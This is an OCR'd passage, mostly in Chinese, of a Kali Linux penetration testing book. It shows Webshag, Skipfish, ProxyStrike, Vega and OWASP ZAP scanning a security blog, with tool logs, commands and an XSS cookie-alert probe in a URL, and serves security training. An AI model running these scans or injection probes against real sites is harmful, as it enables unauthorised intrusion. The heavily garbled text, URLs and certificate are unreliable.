/wp-content/uploads/2011/08/ 


external links: 


www.definethecloud.net 
www.lockpicking101.com 
www.nactac.com 
www.pauldotcom.com 
www.memestreams.net 
www2.wwt.com 
wordpress.org 
automattic.com 
www.feedburner.com 

Console: 


INFO Spidering www.thesecurityblogger.com / 80 


webshag 1.10 


PSCAN INFO SPIDER USCAN | FUZZ 


Settings 
Target(s) [host1, host2,...]: Port(s) [80, 8080,...]: 


|www.thesecurityblogger.com | | 80 | OK Stop | 


Root directoties [/, /dir/,...]: Skip String [Not Found]: | | 


li | | | - automatic -- lv | 


Results 
Targets: Results: 


oor SSeS eer TPIT er 


TOIT] cerrcerygoararrceavcaorery, 


SearchText=scriptalertdocument.cookie/script&PhraseSearchText=scriptalertdocument.cookie/ 
script&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search 


[301] /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</ 
script> 

Redirected to: http://www.thesecurityblogger.com/content/search/? 
SectionID=3&SearchText=scriptalertdocument.cookie/script 


人 
Console: 
ERROR Request failed. Server may be overloaded. 
ERROR Request failed. Server may be overloaded. 
ERROR Request failed. Server may be overloaded. 
ERROR Request failed. Server may be overloaded. 
ERROR Request failed. Server may be overloaded. 
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x webshag 1.10 
| File Tools Help 


d 


| PSCAN INFO SPIDER USCAN FUZZ 


Settings 
Target(s) [host1, host2,...]: Port(s) [80, 8080,...]: 
| www.thesecurityblogger.com | 80 | 


Stop | 


Root directoties [/, /dir/,...]: Expression [log [a-z](1)[0-9](2) txt]: 
|J | @ Fuzz Directories @ Fuzz Files | Switch to Gen Mode 


Results 
Targets: Results: 


[403] /cgi-bin/ 
[401] /stats/ 
[200] /wp-content/ 
[200] /wp-includes/ 
RA ee) 


Console: 


TARGET Scanning www.thesecurityblogger.com / 80 


Webshag 支 持 将 安全 审计 中 发 现 的 所 有 数据 以 XML 、HTML 和 TXT 文件 格式 导出 。Webshag 
的 最 终 报告 会 以 逻辑 化 的 格式 输出 , 这 使 其 可 以 作为 单独 的 文档 , 也 可 以 作为 渗透 测试 交付 报告 
中 引用 的 文章 。 下 面 两 个 截图 分 别 显示 了 导出 选项 和 审计 报告 的 开头 部 分 。 


| x Export Report... 
Export Results: 
&j Port Scanner 8j Info fj Spider fj URL Scanner £j Fuzzer 
Output File: 
\/root/Desktop/results | Open 


Output File Format: 
xml 


Audit Report 


26-04-2013 


Port Scanner 


64.90.50.80 


80 (tcp) 
Service: 
587 (tcp) 
Service: 


Product: 


Info 


Spider 
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有 关 Webshag 的 更 多 信息 可 以 参考 : http://www.scrt.ch/en/attack/downloads/ 
webshag. 


3.1.2 Skipfish 


Skipfish 是 一 款 Web 应 用 安全 侦察 工具 。Skipfish 会 利用 递归 爬虫 和 基于 字典 的 探 针 生成 一 幅 
交互 式 网 站 地 图 。 最 终生 成 的 地 图 会 在 通过 安全 检查 后 输出 。 


Skipfish 可 以 在 Web Applications > Web Vulnerability Scanners 中 找到 ， 名 为 skipfish。 首 次 
启动 Skipfish 时 , 它 会 弹出 一 个 终端 窗口 来 展示 Skipfish 的 命令 。Skipfish 可 以 用 自 带 字典 或 是 定制 
字典 来 进行 漏洞 评 佑 。 


有 些 字典 可 能 在 Kali 中 找 不 到 。 你 可 以 从 https://code.google.com/p/skipfish/ 
下 载 Skipfish 的 最 新 版 本 和 默认 字典 。 


所 有 可 用 的 字典 都 位 于 dictionaries 目 录 中 。 


:~/Desktop/skipfish-2 0b/dietionaries# ts 


complete.wl  extensions-only.wl medium.wl minimal .wl 


Skipfish 包 含 各 种 命令 选项 。 运 行 Skipfish 时 ， 如 果 要 对 某 个 目标 网 站 使 用 定制 字典 ， 可 以 先 
输入 skipfish， 然 后 用 -WwW 选项 后 跟 字 典 文件 的 位 置 路 径 来 选 定 字典 , 在 其 后 再 用 -o 后 跟 位 置 路 
径 来 指定 输出 目录 ， 最 后 是 目标 网 站 : 

skipfish -o (输出 位 置 ) -W (字典 文件 的 位 置 ) (目标 网 站 ) 

下 面 的 例子 演示 了 使 用 名 为 complete.wl 的 字典 文件 来 对 securityblogger.com 进 行 扫 描 。 
Skipfish 会 在 揭 面 创建 一 个 名 为 Skipfishoutput 的 目录 。 关 键 字 skipfish -o/root/Desktop/ 


Skipfishoutput 指 定 了 输 iz 吉 果 的 位 置 ， -W/root/Desktop/complete. wl 指定 了 字典 的 位 
置 路 http://wwwi.thesecurity blogger.com 则 是 扫描 的 目标 。 


:~# skipfish -o /root/Desktop/Skipfishoutput -W /root/Desktop/complete.wl http://www.thesecurityb 


logger.conl 
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在 用 -W 选 项 时 ， 后 跟 skipfish 默 认 的 字典 不 会 运行 。 你 可 以 复制 一 份 默认 
的 单词 表 并 移 除 单词 表 的 第 一 行 (#ro )， 将 其 当做 一 个 定制 的 单词 表 。 如 下 面 
的 截图 所 示 : 


complete.wl 


File Edit Search Options Help 


à. - à B i à à à e à à - à à - 
" " 2) 7 A " e» [ 


config 


AR HARTE RUE. IR BI SB. 上面 会 说 60 秒 后 目 动 局 动 , 或 立即 按 下 任意 
BEE 5) o 


Welcome to skipfish. Here are some useful tips: 


1) To abort the scan at any time, press Ci . A partial report will be written 
to the specified Location. To view a List of currently scanned URLs, you can 
press at any time during the scan. 


2) Watch the number requests per second shown on the main screen. If this figure 
drops below 100-200, the scan will Likely take a very long time. 


3) The scanner does not auto-Limit the scope of the scan; on complex sites, you 
may need to specify Locations to exclude, or Limit brute-force steps. 


4) There are several new releases of the scanner every month. If you run into 
trouble, check for a newer version first, Let the author know next. 


More info: http: //code. google. com/p/skipfish/wiki/KnownIssues 


241544 


Press any key to continue (or wait 60 seconds)... 


AY LIFE PRA ALA a, 或 是 观察 默认 的 数字 。 sé H aH PEAS EDT 3 OF) Z1 
几 个 小 时 不 等 。 可 以 输入 Ctrl + C 来 提前 结束 扫描 。 


skipfish version 2.69b by Lcamtuf@google.com 


- www.thesecurityblogger.com - 
Scan statistics: 


0:00:27.858 

1167 (42.0/s), 612 kB in, 244 kB out (30.8 kB/s) 
322 kB in, 550 kB out (26.1% gain) 

09 net errors, 0 proto errors, 0 retried, 0 drops 
22 total (54.5 req/conn) 

9 failures, 0 timeouts, 1 purged 

119 skipped 

31 


Database statistics: 


123 total, 1 done (0.81%) 

107 pending, 13 init, 1 attacks, 1 dict 

1 spotted 

1 serv, 34 dir, 11 file, 0 pinfo, 54 unkn, 23 par, © val 
5 info, 0 warn, 8 low, 4 medium, © high impact 

2506 words (335 new), 76 extensions, 256 candidates 

75 total 


一 旦 扫描 结束 ,或 是 你 提前 终止 ，Skipfish 会 在 用 -o 选 项 指定 的 位 置 生成 很 多 文件 。 要 查看 
结果 ， 点 击 index.html 文 件 ， 它 会 打开 Web 浏 览 大 。 你 可 以 点 击 每 个 下 拉 选 单 来 查看 结果 。 在 示 
例 报 告 部 分 可 以 了 解 更 多 信息 。 


(d (e — "2€ m = Scanner version: Scan date: 
| piis shy D Random seed: | Total time: 


Å 
=) 
Sex M Uo Problems with this scan? Click here for advice 


Crawl results - click to expand: 


QJ = http://www.example.com/ @4 O6 «267 
New 404 signature seen 


Í. : 
New 'Server' header value seen 


include 3 
README 


icons @4 ©2 «557 


index.html 


Document type overview - click to expand: 


application/xhtml+xml (5 


3.1.3 ProxyStrike 
ProxyStrike 是 一 个 Web 应 用 代理 , 用 来 在 浏览 应 用 时 找 出 漏洞 。 它 的 运行 机 制 跟 代理 类 似 ， 
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默认 监听 8008 端 口 ， 也 就 是 说 ， 你 要 对 浏览 万 进行 配置 ， 使 其 运行 时 经 过 ProxyStrike。 这 样 它 
才能 在 你 浏览 目标 网 站 时 在 后 台 分 析 所 有 参数 。 代 理 功 能 非常 适合 用 来 识别 、 拦 截 和 修改 请 求 
的 内 容 。 


要 配置 如 Firefox 之 类 的 浏览 锅 ， 使 其 使 用 ProxyStrike， 你 可 以 选择 Firefox > Preferences > 
Advanced > Network， 人 然后 选择 Settings。 再 选择 Manual Proxy， 输 入 Kali 服 务 需 的 卫 地 址 ， 后 
Wm Ss 8008 ( 除非 你 打算 修改 ProxyStrike 的 默认 端口 )。 


9 OGE Advanced 


pleas A FB & OQ 


General Tabs Content Applications Privacy Security Sync Advanced 


Configure Proxies to Access the Internet 


( JNo proxy 


( JAuto-detect proxy settings for this network 


( JUse system proxy settings 
(*) Manual proxy configuration: 
HTTP Proxy: 172.16.76.131 Port: 8008 ;| 
Use this proxy server for all protocols 
SSL Proxy: 
FTP Proxy: 
SOCKS Host: 
_)SOCKS v4 (+) SOCKS v5 


要 使 用 ProxyStrike j| "5 Web Applications > Web Vulnerability Scanners ， 然 后 选择 
ProxyStrike. 假设 你 的 浏览 做 发 送 的 流量 都 会 经 过 ProxyStrike, 你 会 在 Comms 标 签 下 看 到 抓 取 的 
数据 。 我 们 会 在 第 6 章 中 进一步 介绍 如 何 使 用 代理 。 


ProxyStrike v2.1 
Help 
Comms Request Stats Variable Stats Config Plugins Log Repeat Request Crawler 


Method Target 


http://googleads.g.doubleclick.net /pagead/ads?client=ca-pub-9261916952152076&output=html &h=200&slotname=95946 
http://googleads.g.doubleclick.net /pagead/ads?client=ca-pub-9261916952152076&output=html&h=600&slotname= 21210 
http://googleads.g.doubleclick.net /pagead/ads?client=ca-pub-9261916952152076&output=html &h=600&slotname= 21210 


httn://nivel auantcearve cam [nivel 


Select 


O Get O Post (9 All Intercept Edit requests in view | | Delete requests in view | | Delete selected requests 


Target: | All 2 


Path: |All 2 


| 


ro rr 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*,q=0.8 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:20.0) Gecko/20100101 Firefox/20.0 
Connection: close 

Cookie: __utma=253748300.1757255857.1366923731.1367354074.1374097140.3; 
__utmz=253748300.1366923731.1.1.utmcsr=(direct) |utmccnz (direct) |utmcmdz (none); 
--qca-P0-2019225104-1366923733115; __utmb=253748300.1.10.1374097140; .-.utmc- 253748300 


ICID Responses | Requests 


62 $33 ”服务 器 端 攻击 


ana 


JE E Dh HE FH SE HA H «Bh Pd v AY SQL BK SSL A R XSS fé £F s ed AE HY 75 f o RN RE 
ProxyStrikei E Jj f ESLBE BE HITS BE ESE yi ERIXSSiBTE—ÁG 351] (8 d 788, PRAT 
以 点 击 Plugins 标 签 ， 深 动 到 XSS 插 件 ， 在 义 选 框 中 多 选 并 启用 该 插件 。 然 后， 选择 Crawler 标 签 ， 
输入 带 http:// 的 目标 网 站 URL, 使 用 插件 框 来 检查 念 虫 ， 然后 点 击 它 上 面 大 大 的 Stop 按 钮 ,使 
其 状态 变 为 Running。 添 加 这 些 插件 会 增加 扫描 需要 的 时 间 。ProxyStrike 会 显示 一 个 状态 栏 ， 在 
那里 会 显示 出 扫 摘 还 要 持续 的 时 间 。 


Comms Request Stats Variable Stats Config Plugins 
k 
Plugin selection: | XSS & SSI attacks © 


M enable 


Comms Request Stats Variable Stats Config Plugins Log Repeat Request Crawler 


Uniq Froms 
Stopped 


| Crawl using plugins 


Url: Ihttp://www.thesecurityblogger.com 


076 | Not Running 


x ProxyStrike v2.1 


Comms Request Stats Variable Stats Config Plugins Log Repeat Request Crawler 


Running -http://www.thesecurityblogger.com 


http://www.thesecurityblogger.com 
3 | http://www.thesecurityblogger.com/?p=2068#comments 
&j Crawl using plugins http://www.thesecurityblogger.com/?p=2068#more-2068 
http://www.thesecurityblogger.com/?attachment_id=2070 
http://www.thesecurityblogger.com/?attachment_id=2071 
http://www.thesecurityblogger.com/?p=2068 
http://www.thesecurityblogger.com/?p=2098#comments 
http://www.thesecurityblogger.com/?p=2098#more-2098 
Reset http://www.thesecurityblogger.com/?attachment_id=2100 
http://www.thesecurityblogger.com/?attachment_id=2099 
http://www.thesecurityblogger.com/?p=2098 
http://www.thesecurityblogger.com/?p=1903#comments 
http://www.thesecurityblogger.com/?attachment_id=1999 
http://www.thesecurityblogger.com/?attachment_id=1996 
http://www.thesecurityblogger.com/?attachment_id=2113 
http://www.thesecurityblogger.com/7attachment_id=1992 
http://www.thesecurityblogger.com/?attachment_id=2112 
http://www.thesecurityblogger.com/?attachment_id=2111 
Crawling process: The crawling process is performed by TWO threads http://www.thesecurityblogger.com/?p=2123#respond 
http://www.thesecurityblogger.com/?attachment_id=2127 
http://www.thesecurityblogger.com/?p=2123#more-2123 
http://www.thesecurityblogger.com/?attachment_id=2126 
| The urls detected can be forwarded to enabled plugins. http://www.thesecurityblogger.com/?attachment_id=2125 
http://www.thesecurityblogger.com/?p=2123 
http://www.thesecurityblogger.com/?p=2161#comments 


ttp://www.thesecurityblogger.com 


14% 473/3253 


| to avoid web server overloading. 


Moreover detected forms are shown in the table and can be filled 


manually by double-clicking on each link. Enjoy! 
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Plugins 标 签 会 在 扫描 开始 后 显示 疏 虫 的 结 末 。 这 里 找到 的 攻击 可 以 导出 为 HTML 或 XML 。 


Comms Request Stats Variable Stats Config Plugins | Log RepeatRequest Crawler 


Plugin selection: [XSS & SSI attacks v | | Reset cache | | Export HTML | | Export XML | 


enable 


Request threads | 1 : 


‘url 


| Injections Available 
| = http://www.thesecurityblogger.com/?cat=242 


GET 
| = http://www.thesecurityblogger.com/?tag=the-balancing-act 


GET ' (Single Quotes) (Normal Encoding): 
| ( ) (Parenthesis) (Normal Encoding) 
| = http://www.thesecurityblogger.com/?p=2068 


GET 
= http://www.thesecurityblogger.com/?attachment id—2071 


attachment id GET 
= http://www.thesecurityblogger.com/?page id-2 


page id GET 
| = http://www.thesecurityblogger.com/?feed=comments-rss2 


feed GET ( ) (Parenthesis) (Normal Encoding) 


Log 标 签 会 显示 哪些 任务 已 经 针对 目标 网 站 在 运行 了 了 ， 以 及 每 个 攻击 的 成 功 等 级 。 这 个 文件 
可 以 复制 到 一 个 文本 文件 中 作为 最 终 交 付 的 结果 的 一 部 分 。Crawler 标 签 会 列 出 所 有 跟 目 标 关 联 
的 已 发 现 的 去 重 后 的 Web 链 接 。 


Comms Request Stats Variable Stats Config Plugins | Log Repeat Request Crawler 
Log output: 


Trying sql Injection on: [ URL: http://www.thesecurityblogger.com/wp- 
includes/js/thickbox/thickbox.js?ver=3.1-20121105 ] 


XSS/SSI 
[ URL: http://www.thesecurityblogger.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105 ] 


Stab 1- DONE 
Trying ver... 
十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 FINISH XSS/SSI 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 


[ URL: http://www.thesecurityblogger.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105 ] 
十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 


Stab 2 - DONE 
URL is STABLE 


ProxyStrike 提 供 了 其 他 一 些 有 用 的 功能 。 有 关 ProxyStrike 的 更 多 内 容 可 以 参考 http://www. 
edge-security.com/proxystrike.php. 


3.1.4 Vega 
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Vega 是 一 个 安全 测试 工具 ， 用 来 候 取 一 个 网 站 ， 并 分 析 页 面 内容 来 找到 链接 和 表单 参数 。 
要 运行 Vega， 你 可 以 浏览 Web Applications > Web Vulnerability Scanners， 然 后 选择 Vega。 
Vega 会 完 内 过 一 个 包含 介绍 信息 的 横 条 ， 人 然后 显示 一 个 GUI。 


Subgraph Vega 
File Scan Window Help 


G © Scanner. € Proxy 


Gà Website View = 0 @ Scan Info = m 


@ VEGA 


+ 


© Scan Alerts Scan Alert Summary 


A£& Identities 23 


Proxy is not running 71M of 248M 


Vega 在 右上 角 有 Scanner 和 Proxy 标 签 。 要 将 Vega 用 作 扫 描 器 ， 点 击 右 上 角 的 Scanner 标 签 ， 
然后 点 左上 角 的 Scan 开 始 新 的 扫描 。 


File Scan Window Help 


Q © Scanner € Proxy 
& Website View = |m © Scan Info 


© +} E 


> & www.thesecurityblogger.cc — 


> @ 


> @ 
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你 会 看 到 一 个 文本 输入 框 , 要 求 输入 目标 URL。 下 面 的 例子 是 指向 www.thesecurityblogger.com。 
选择 日 标 后 ， 点 击 Next。 


Scan Target 


@) Enter a base URI for scan: 


http.//www.thesecurityblogger.com 


© Choose a target scope for scan 


Pe PRA] BH Er EA BE, ix HOA AS EE BA ( Injection fll Response E 
Processing )， 其 中 有 很 多 的 扫描 选项 。 展 开 每 个 模块 ， 选 择 你 想 使 用 的 扫描 选项 ， 点 击 Next。 


Select Modules 


Choose which scanner modules to enable for this scan e VEGA 


Select modules to run: 


v [-| Injection Modules 


Format String Injection Checks 

Cross Domain Policy Auditor 

XML Injection checks 

Blind SQL Text Injection Differential Checks 
XSS Injection checks 

Integer Overflow Injection Checks 

Shell Injection Checks 


Blind OS Command Injection 


Remote File Include Checks 
Blind SQL Injection Timing Analysis Checks 


Directory Listing and Traversal Checks 


JN UN [s is O IS < < [S] | 


Blind SOU Iniactian Arithmoatic Euslustion Niffarantisal Chacke 


下 面 两 个 视图 中 提供 了 添加 cookie 和 排除 模式 的 能 力 来 避免 模糊 测试 ， 这 两 个 都 是 可 选 的 。 
你 可 以 不 做 任何 修改 ， 就 使 用 默认 值 ， 在 两 个 屏幕 上 都 点 击 Next。 点 击 Finish 来 开始 扫 摘 。 


Vega 会 显示 活跃 的 扫描 ， 并 将 找到 的 漏洞 映射 到 它们 对 目标 的 威胁 程度 上 。 


File Scan Window Help 


© © Scanner 


@ Website View mL @ Scan Info 


| 


a Hg E 


> @ aca 
> @ 
> @ 
> @ 
> @ 


a T i Scanner Progress 


@VEGA 


© Scan Alerts 


vO 
v @ http://www.thesecurityblo¢ 
P @ Medium (95) 
P @ Low (12) 
P @ Info (106) Scan Alert Summary 
v © 05/09/2013 10:48:57 [Cancel 
P @ http://www.thesecurityblo¢ 


http://www.thesecurityblogger.com/wp-includes/ms-fu 
119 out of 151 scanned (78.8%) 


Q Medium (95 found) 


7r EHA A Website View 的 窗口 会 显示 正在 扫描 的 目标 以 及 跟 主 目标 关联 的 其 他 目标 。 左 下 
角 名 为 Scan Alerts 的 窗口 会 显示 找到 的 漏洞 类 别 。 你 可 以 点 击 警报 下 方 的 三 角 符 号 查看 Vega 找 到 
了 哪些 漏洞 。 点 击 任何 漏洞 ，Vega 都 会 显示 找到 的 漏洞 详情 ， 并 详细 描述 它 可 能 造成 的 影 啊 。 


下 面 的 截图 展示 了 www.thesecuritybloggercom 上 可 能 存在 的 路 站 脚本 漏洞 : 


@ Website View = m © Scan Info m 


Open Source Web Security Platform 


Local Filesystem Paths Found 
> AT A GLANCE 


Classification Information 
Resource /wp-includes/admin-bar. php 


Risk 


© Scan Alerts 
@ + 


> REQUEST 
v © 05/18/2013 08:21:19 [Auc 


GET /wp-includes/admin-bar. php 


v Q http://www.thesecurityb i 


v Ø Medi 105 
o edum ) >» RESOURCE CONTENT 
w 2 Local Filesystem Pa 


2) /home/funktribe/thesecurityblogger.com/wp-includes/admin-bar.php 


2 


*? /wp-includes/aut b DISCUSSION 
* /wp-includes/car Vega has detected a possible absolute filesystem path (i.e. one that is not relative to the web 
root). This information is sensitive, as it may reveal things about the server environment to an 


2 /wp-includes/cat 
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Vega 界 面 上 的 代理 部 分 可 以 查看 跟 目标 网 站 之 间 的 请 求 和 响应 。 代 理 部 分 会 在 扫描 时 弹出 。 


geyo 


Method Request Status Length Time (r 


| http://www.these GET | /wp-content/ 


j http://www. these GET j /wp-includes/ 

| http://www.these GET | /xmlrpc.php 

http://www.these GET lwp-includes/js/ | 

http://www. these GET /wp-includes/them« 200 | | | 
CE 


jos 


Request Response 


<title>Joey Muniz - The Security Blogger</titlLe> 
«link rel="profile” href="http://gmpg.org/xfn/11" /> 
«link rel="stylesheet’ type="text/css” media="all" href="http://www.thesecuritybl« 


«link rel="alternate” type="application/rss+xml" title="The Security Blogger &raqu 
«link rel='stylesheet’ id= thickbox-css' href= http://www.thesecurityblogger.com/w 


«link rel= stylesheet id-'gdsr. style. main-css' href-'http://www.thesecurityblogge 
as%23slpcrystal%23slpdarkness%23s1poxygen%23slgoxygen_gif% 23s1pplain% 23 


ext/css' media='all' /> 
«Link rel z'stylesheet' id-'qdsr. style. xtra-css' href —- 
a 


报告 中 。 


Scan Alert Summary 


Q Medium (106 found) 


Local Filesystem Paths Found 
PHP Error Detected 


Possible Source Code Disclosure 


Q Low (34 found) 


Directory Listing Detected 
Internal Addresses Found 


© Info (119 found) 


News Feed Detected 

Blank Body Detected 
Possible AJAX code detected 
Character Set Not Specified 


3.1.5 Owasp-Zap 
Owasp-Zap 也 称 为 Zaproxy， 是 一 个 专门 为 Web 应 用 的 安全 测试 而 设计 的 拦截 代理 。 


68 


你 可 以 浏览 Web Applications > Web Application Fuzzers , 
Zaproxy。 打 开 后 会 弹出 一 个 免责 声 


接受 


第 3 章 ”服务 


3m 


授权 证 书 的 


> Hy DL dr 


明 ， 必 须 接受 
页 声明 之 后 ，Owasp-Zap 工 具 会 启动 ， 并 显示 为 外 一 个 弹出 窗口 ， 


能 局 动 该 程序 。 


然后 选择 owasp-zap 来 打开 


询问 你 


是 否 要 创建 一 个 SSL 根 CA 证 书 。 这 样 Zaproxy 就 可 以 拦截 浏览 妖 中 通过 SSL 传 送 的 HTTPS 数 据 。 


对 测试 使 用 HTTPS 的 应 用 来 说 ， 


这 非常 重要 。 要 生成 SSL 证 书 ， 点 击 Generate 按 钮 即 可 。 


OWASP ZAP 


SSL Root CA certificate 


; & (SSL won't work if you haven't created and imported an 
OWASP ZAP CA root certificate. You can create such a 
| certificate any time in the options menu, so you do not have 
to create it right now. 


| Generate | Go to options pane! and create certificate now. 


| Later | Not now, but create certificate later. 


然后 它 会 弹出 一 个 窗口 询问 是 要 生成 还 是 导入 证 书 。 你 可 以 点 击 Generate 来 生成 证 书 。 可 以 


点 击 Save 来 保存 新 生成 的 证 书 ， 


owasp cap root ca.cer。 


| G Desktop 


pe: 


Y Options 


& Sites Active Scan 
AJAX Spider 


Anti CSRF Tokens 


API 
Applicatio 


Authentication 


ns 


Rraaknainte 


Save 


owasp_zap_root_ca.cer 


LE 


Root ^^ -^"*ifica... 


[ej m 


= 


m 


A0.MO.word 
| AO. M10.hash 
' A0. M10.word 
complete,wl 
complete.wl.old 


| Save || 


» 


Cancel 


BEGIN CERTIFICATE 
MIID6DCCAt Cg AwIBAgIENk«*ZqTANBgk qhk i GQwOBAQUFADCBgj EnMCUGAL 
T1dBU1 Agwm Vk LEFOdGF] ay BOcm94eS8Sb 290I ENBMRYwF AYDVOQHDAOZNT, 
Y¥2IkKMTk x HRYwFAYDVQOKDA1PVOFTUCBSb 2901ENBMRowGAYDVQQLDBFP VO 
QVAgUn9vdCBDQOTELMAKk GA1 UEBhMCeHgwHh c NHTMwNT ASMj EzNj AQWhcNMT 
Mj EzNj AGW) CBgj EnMCUGALUEAwweT1dBU1 Agwm Vk IEFOdGF) ayBOcm94eS 
TENBMRY wFAYDVOQQHDAOZNT gwZTLy Y 2Jk MTk xMRYWwFAYDVOOKDA1PVOFTUC 
TENBMRowGAYDVOOLDBFPVOFTUCBa OVAgUm Sv dCBDOTELMAk GA1 UEBhMCeH 
MAOGCSqGSIbSDQEBAQUAAAIBDwAwggEKAoIBAQCSGubv32zpj NaEF73Na 9a 
*hs32GJXy FITSFbGRhqgnMcELHFfZSI rGo00Kwol d0BBQ730/M/tj wG/skyY 
vbP8NPi Cf pOSEEbgdQp3zj c 456HD3fmgzFeri2wOZiKo54JYOplQcj SiEv 
fhPUOTnH] t «EhwmVut J80k aEVyTk ArITLCxbqBaH+t XBaYlnh63WHbFnQF. 
LN) cswt ft xNRrMFSSViycBne37ZIGIHdSrPi/ J9pJ6zDHmg1 VIBSLapG6o 
3FM4q1j ICwkUC+* 61 XR2nEUKne YHDHF2) j t zU« TpmEu Jn AH) 4Gn SSXk Qn r / 
AAG) ZDB1MBOGAl1UdDgOWBBSZ3Eb6L Jl HPBu fwy Bm r rl UGPKIKz APBgNVHR 
STADAQH/MAsGA1UdDwOEAwIBt; Aj BgNVHSUEHDAaBggr BgEFBOcDAQYIKw 
AwIGBFUd JOAwDOY JKoZIhvcNAQEFBQADggEBAF9GNt Bj VnZq3Xy d CRgenO 
f9pCXHAiHvuRXIwCx4rPj /pqkNzp/epIPzHah3yYBlSv2DIACcZaB23Kc SN 
| /RD8j /nOCI6srThoDdIFHgWr443NHUk 3ZxOZEaGNg5NnooliltsHPr3IdV 
SeyzZGqy x 3X54PBQJnITIDf Zw4JFoKF / Hk JDV*Cms* NABhhTT4ulUgq9mK 
7mXLNU«*aOt HGV6EePuoERUSd rak J9z ZAnp / 2M2J/HLqx9vOf8iutlryfek 
Muz7ADb* /tvk7N/r3XUl QM/uXz CWOcbbIkOy SOTKBBSbpmlPFifBAQv4pJ 
ENO CERTIFICATE 


一 一 7 
! | tol Save | 


然后 选择 保存 的 地 方 。 新 生成 的 证 书 文件 我 们 命名 为 


保存 好 CA 文件 后 ， 点击 OK, SJUSTIJEDU Vas. X T Firefox, 你 可 以 点 击 Edit> Preferences, 


然后 选择 Advanced 标 签 。 点 击 Encryption 子 标签 ， 选 择 View Certificates。 再 点 击 Import， 


选择 
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你 在 Zaproxy 中 生成 的 证 书 (那个 .cer 文 件 )。Firefox 会 询问 在 哪些 用 途 可 以 信任 该 数字 证 书 认证 
机 构 (CA, Certificate Authority )。 勾 选 全 部 这 三 个 选项 : 信任 网 站 、 电 子 邮 件 用 户 和 软件 开发 
人 员 。 点 击 两 次 OK 完成 配置 。 


You have been asked to trust a new Certificate Authority (CA). 


Do you want to trust "OWASP Zed Attack Proxy Root CA" for the following purposes? 


加 Trust this CA to identify websites. 


v Trust this CA to identify email users. 


(VÀ Trust this CA to identify software developers. 


Before trusting this CA for any purpose, you should examine its certificate and its policy 
and procedures (if available). 


View Examine CA certificate 


Cancel | [| OK | 


下 一 步 是 设置 Firefox 来 将 所 有 数据 流 都 导 加 Zaproxy。 选 择 Edit > Preferences, 点 击 Advanced 
标签 ， 然 后 选择 Network 标 签 。 点 击 Configure 按 钮 ， 再 点 击 Manual proxy configuration, ， 输 入 
localhost 和 端口 8080 (Zaproxy 的 默认 端口 )。 勾 选 Use this proxy server for all protocols 
的 色 选 框 ， 点 击 OK。 下 面 的 截图 显示 的 就 是 我 们 刚刚 做 的 配置 . 


Connection Settings 


Configure Proxies to Access the Internet 
No proxy 
Auto-detect proxy settings for this network 
Use system proxy settings 
® Manual proxy configuration: 


HTTP Proxy: | localhost Port 


Y, Use this proxy server for all protocols 


No Proxy for 


localhost, 127.0.0.1 


Example: mozilla.org, .net.nz, 192.168.1.0/24 


Automatic proxy configuration URL 


Cancel 


He 
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打开 Zaproxy， 此 时 应 该 能 在 左上 角 看 到 一 个 Sites 窗 口 。 这 个 窗口 会 在 你 用 Firefox 浏 览 互 联 
网 时 出 现 。 你 可 以 在 右 侧 窗口 查看 每 个 页 面 的 所 有 请 求 和 啊 应 。Zaproxy 提 供 了 一 个 便捷 的 界面 ， 
用 于 查看 各 个 网 页 用 到 的 所 有 资源 。 


你 还 可 以 访问 快速 启动 窗口 、 在 URL to attack 字 段 输入 目标 网 站 的 URL 来 对 目标 网 站 进行 测 
试 。 下面 的 截图 就 是 Zaproxy 对 .thesecurityblogger.com 进 行 扫描 的 场景 : 


Untitled Session - OWASP ZAP 


Eile Edit View Analyse Report Tools Online Help 


DEN. 


[Standard mode jJ ^ id LL] UMP — d Do OB y seb POE e 
Sites ip ‘| Quick Start 4¢ | Requeste* | Responses | Break X 


* @ P Sites a 
Welcome to the OWASP Zed Attack Proxy (ZAP) | 


| ZAP is an easy to use Integrated penetration testing tool for finding vulnerabilities in web applications. 
Please be aware that you should only attack applications that you have been specifically been given perr 


To quickly test an application, enter its URL below and press "Attack", 


URL to attack: http:/I/www.thesecurityblogger.com 
F atack | OC) Stop: | 


| Progress Spidering the URL to discover the content 


For a mare in depth test you should explore your application using your browser or automated regressio 


Lu som ARS o i ob a diua mmm PY | Pe 
* 


| History = Search “a |. 


Spider a Forced Browse Pi Fuzer d 


Site: | www, thesecurityblogger.com:80 * |t 


Processed | Method | URI Flaqs 
= GET http: féwww.thesecurityblagger. com SEED 
GET hite: aww.thesecurib/blogger. comi 
GET http: /Faww.thesecuribyblegger. com/Tpage idm2 
GET http: Few. thesecurit/blegger. com/?7pagedaz 
GET http: Mema thesecurit/blagger com/?pse26720 


Alerts MO Po E2 mI Current Scans ^ o X1 


Zaproxy JE H ty ld LA HER BSH IUE efe. PETIA. SITUE DAN 
的 漏洞 ， 可 以 点 击 Alerts 标 签 。 


Spider 3& | Forced Browse 4^ | Fuzer © I Params E] | Http Sessions = | WebSockets gf | AJAX Spi 


History 党 | Break Points 其 


(3 Cross-domain JavaScript source file inclusion 
= URL: http://www.thesecurityblogger.com 

v (gj Alerts (4) Ra Ard ss 

JA Reliability: Warning 

» = F Private IP disclosure (3) Parameter: https://apis. google. com/js/plusone.js 

> ug X-Content-Type-Options header missing (91) Attack: 

* [ij @ X-Frame-Options header not set (91) Description: 


Rf Cross-domain JavaScript source file inclusion (273) 


Zaproxy 默 认 不 会 自动 进行 身份 认证 。 如 果 使 用 的 是 默认 设置 ， 在 自动 打 描 
S 中 所 有 的 登录 请 求 都 会 失败 。 
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你 可 以 在 Zaproxy 中 设置 自动 登录 ; 不 过 ， 需 要 在 使 用 Zaproxy 时 首先 人 工 登 录 网 站 ， 告 诉 
Zaproxy 登 录 和 退出 登录 的 请 求 是 哪个 ,然后 再 启动 自动 登录 功能 ,GET 请 求 会 出 现在 Sites 窗 口中 ， 
你 必须 在 Responses 标 签 中 高 亮 标 记 登 录 和 退出 登录 的 啊 应 ， 具 体 步 骤 为 : 右键 点 击 啊 应 结果 ， 
